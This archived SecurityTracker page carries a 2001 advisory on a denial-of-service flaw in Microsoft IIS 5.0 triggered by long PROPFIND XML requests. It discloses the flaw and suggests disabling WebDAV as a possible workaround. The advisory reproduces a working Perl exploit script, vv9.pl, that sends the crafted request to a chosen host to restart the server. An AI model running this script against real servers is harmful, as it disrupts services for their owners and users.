SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Server/CGI)  >   Microsoft Internet Information Server (IIS) Web Server Vendors:   Microsoft
Microsoft IIS Web Server Lets Remote Users Restart the Web Server with Another Specially Crafted PROPFIND XML Command
SecurityTracker Alert ID:  1001483
SecurityTracker URL:  http://securitytracker.com/id/1001483
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  May 6 2001
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): IIS 5.0
Description:   Georgi Guninski released a security advisory warning of another vulnerability in the way Microsoft's Internet Information Server (IIS) web server processes PROPFIND XML requests. This vulnerability allows remote users to cause the web server software to restart, creating a denial of service condition.

It is reportedly possible to use a specially crafted PROPFIND XML command to remotely restart all IIS related services. If this request is repeated, a remote user can create a denial of service condition.

The specially crafted PROPFIND XML command is composed of a lengthy but valid request that includes many ":" colon characters.

The author of the advisory has posted a demonstration exploit script, contained in the Source Message.

Please note that a similar but different vulnerability was reported in March 2001.

Impact:   A remote user can cause the IIS web server to restart. By doing so repeatedly, the remote user can cause the web server to become inoperable.
Solution:   No solution was available at the time of this entry. The author of the advisory suggests that disabling WebDAV requests may help, but this has not been confirmed.
Vendor URL:  www.microsoft.com/technet/security/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Windows (2000)

Message History:   None.


 Source Message Contents

Subject:  IIS 5.0 PROPFIND DOS #2


Georgi Guninski security advisory #44, 2001

IIS 5.0 PROPFIND DOS #2

Systems affected:
IIS 5.0

Risk: Medium
Date: 6 May 2001

Legal Notice:
This Advisory is Copyright (c) 2001 Georgi Guninski. You may distribute it unmodified.
You may not modify it and distribute it or distribute parts of it without the author's
written permission.

Disclaimer:
The opinions expressed in this advisory and program are my own and not of any company.
The usual standard disclaimer applies, especially the fact that Georgi Guninski
is not liable for any damages caused by direct or  indirect use of the information
or functionality provided by this advisory or program.
Georgi Guninski bears no responsibility for content or misuse of this advisory or program
or
any derivatives thereof.


Description:

It is possible to remotely restart all IIS related services using specially crafted
request.
If this request is repeated continously this seriously affects IIS performance.

Details:

Basically the problem are very long but valid propfind request containing lots of ":".


Demonstration:

--vv9.pl-------------------------------------------------------------------
#!/usr/bin/perl
use IO::Socket;
printf "Written by Georgi Guninski wait some time\n";
$port = @ARGV[1];
$host = @ARGV[0];

sub vv()
{
$ll=$_[0];
$socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") ||
return;
$over=":" x $ll ; # the ":" is the most important
$ch=pack("C",65); # just to check whether potentail payload is possible - yes
$tmp = $ch x 64;
$over= $ch x 4 . $over . $tmp;
$over1=":" x $ll; #not sure about this

$xml='<?xml version="1.0"?><a:propfind xmlns:a="DAV:" xmlns:u="'."$over1".':">';
$xml=$xml.'<a:prop><a:displayname />'."<u:$over />".'</a:prop></a:propfind>'."\n\n";
$l=length($xml);
$req="PROPFIND / HTTP/1\.1\nContent-type: text/xml\nHost: $host\nContent-length:
$l\n\n$xml\n\n";
syswrite($socket,$req,length($req));
print ".";
$socket->read($res,200);
print $res;
close $socket;
}


do vv(59060);
#this is overflow, repeat several times - 49060 seems the smallest #, may need to change
sleep(1);
do vv(59060);

---------------------------------------------------------------------------

Workaround: Disabling WebDav extensions may help
though I do not recommend using IIS on the Internet.

Vendor status:
Microsoft was informed on 1 May 2001

Regards,
Georgi Guninski
http://www.guninski.com

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC